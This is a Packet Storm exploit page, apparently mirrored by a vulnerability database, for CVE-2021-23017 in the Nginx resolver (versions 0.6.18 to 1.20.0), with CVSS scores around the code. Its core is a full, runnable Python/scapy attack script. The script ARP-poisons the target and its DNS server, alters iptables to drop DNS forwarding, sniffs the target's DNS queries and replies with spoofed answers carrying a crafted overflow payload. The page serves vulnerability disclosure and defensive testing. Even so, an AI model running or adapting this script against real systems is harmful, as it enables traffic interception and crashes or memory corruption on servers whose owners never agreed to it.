Lucene search

K
packetstormMohammed AlshehriPACKETSTORM:167720
HistoryJul 11, 2022 - 12:00 a.m.

Nginx 1.20.0 Denial Of Service

2022-07-1100:00:00
Mohammed Alshehri
packetstormsecurity.com
603

9.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

`# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)  
# Date: 2022-6-29  
# Exploit Author: Mohammed Alshehri - https://Github.com/M507  
# Vendor Homepage: https://nginx.org/  
# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0  
# Version: 0.6.18 - 1.20.0  
# Tested on: Ubuntu 18.04.4 LTS bionic   
# CVE: CVE-2021-23017  
# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn  
# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1  
# The service needs to be configured to use Nginx resolver  
  
from scapy.all import *  
from multiprocessing import Process  
from binascii import hexlify, unhexlify  
import argparse, time, os  
  
def device_setup():  
os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")  
os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")  
  
def ARPP(target, dns_server):  
print("[*] Sending poisoned ARP packets")  
target_mac = getmacbyip(target)  
dns_server_mac = getmacbyip(dns_server)  
while True:  
time.sleep(2)  
send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)  
send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)  
  
def exploit(target):  
print("[*] Listening ")  
sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)  
  
"""  
RFC schema  
0 1 2 3  
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| LENGTH | ID |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| ANCOUNT | NSCOUNT |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| ARCOUNT | QD |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| AN | NS |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
| AR |  
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+  
  
Fig. DNS   
  
"""  
def process_received_packet(received_packet):  
if received_packet[IP].src == target_ip:  
if received_packet.haslayer(DNS):  
if DNSQR in received_packet:  
print("[*] the received packet: " + str(bytes_hex(received_packet)))  
print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))  
try:  
# \/ the received DNS request  
dns_request = received_packet[DNS].build()  
null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)  
print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))  
print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))  
payload = [  
dns_request[0:2],  
b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",  
dns_request[12:null_pointer_index+1],  
dns_request[null_pointer_index+1:null_pointer_index+3],  
dns_request[null_pointer_index+3:null_pointer_index+5],  
b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",  
b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",  
b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",  
b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"  
]  
  
payload = b"".join(payload)  
spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\  
UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\  
payload)  
print("[+] dns answer: "+str(hexlify(payload)))  
print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))  
  
sendp(spoofed_pkt, count=1)  
print("\n[+] malicious answer was sent")  
print("[+] exploited\n")  
except:  
print("\n[-] ERROR")  
  
def main():  
global target_ip  
parser = argparse.ArgumentParser()  
parser.add_argument("-t", "--target", help="IP address of the target")  
parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")  
args = parser.parse_args()  
target_ip = args.target  
dns_server_ip = args.dns_server  
device_setup()  
processes_list = []  
ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))  
exploitProcess = Process(target=exploit,args=(target_ip,))  
processes_list.append(ARPPProcess)  
processes_list.append(exploitProcess)  
for process in processes_list:  
process.start()  
for process in processes_list:  
process.join()  
  
if __name__ == '__main__':  
target_ip = ""  
main()  
  
  
`

9.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P